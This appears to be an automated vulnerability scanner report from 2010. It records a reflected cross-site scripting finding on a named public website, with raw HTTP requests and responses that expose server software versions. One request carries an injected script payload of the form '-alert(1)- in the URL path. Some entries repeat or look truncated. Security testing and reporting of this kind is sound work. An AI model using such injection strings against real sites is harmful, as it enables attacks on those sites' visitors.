1. Cross-site scripting (reflected)
1.1. http://www.wisegeek.com/who-is-ferdinand-marcos.htm [REST URL parameter 1]
Severity: | High |
Confidence: | Certain |
Host: | http://www.wisegeek.com |
Path: | /who-is-ferdinand-marcos |
GET /3c0b9'-alert(1)- Host: www.wisegeek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Connection: close Date: Sun, 21 Nov 2010 21:33:07 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny4 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny4 Set-Cookie: wsscfm=eJwr9kyxTUpON Set-Cookie: ufd=eJwrSExPLctMLfcr Set-Cookie: tm=eJzLTLE1MjVUS7Y1A Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 9120 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link rel="stylesheet" type="text/css" href="http://fonts <link rel="stylesh ...[SNIP]... <script> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-176713-1']); _gaq.push(['_trackPa (function() { var ga = document.createElement( ga.src = ('https:' == document.location ga.setAttribute('a ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wisegeek.com |
Path: | /who-is-ferdinand-marcos |
GET /who-is-ferdinand-marcos Host: www.wisegeek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Sun, 21 Nov 2010 21:33:06 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny4 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny4 Set-Cookie: wsscfm=eJwr9kyxNTVIS Set-Cookie: ufd=eJwrSExPLctMLfcr Set-Cookie: tm=eJzLTLE1MjVUS7Y1A Set-Cookie: i=world-1.gif Set-Cookie: c41=eJzLTLE1MjRRS7Y1 Set-Cookie: ufd=eJwrSExPLctMLfcr Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 31478 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Who is Ferdinand Marcos?</title> <link rel="stylesheet" type="text/css" href="http://fonts ...[SNIP]... rrow_id","discussion ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wisegeek.com |
Path: | /who-is-ferdinand-marcos |
GET /who-is-ferdinand-marcos Host: www.wisegeek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Sun, 21 Nov 2010 21:33:05 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny4 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny4 Set-Cookie: wsscfm=eJwr9kyxNTEzN Set-Cookie: ufd=eJwrSExPLctMLfcr Set-Cookie: tm=eJzLTLE1MjVUS7a1B Set-Cookie: i=world-1.gif Set-Cookie: c41=eJzLTLE1MjRRS7Y1 Set-Cookie: ufd=eJxNybEKgCAURuG3 Cache-Control: no-cache, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 32461 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Who is Ferdinand Marcos?</title> <link rel="stylesheet" type="text/css" href="http://fonts ...[SNIP]... <script> var artId = 39260; var tpl = "repeating-link-units-in var plId = "1290375185.7.6972"; var artUrl = "/who-is-ferdinand-marcos </script> ...[SNIP]... |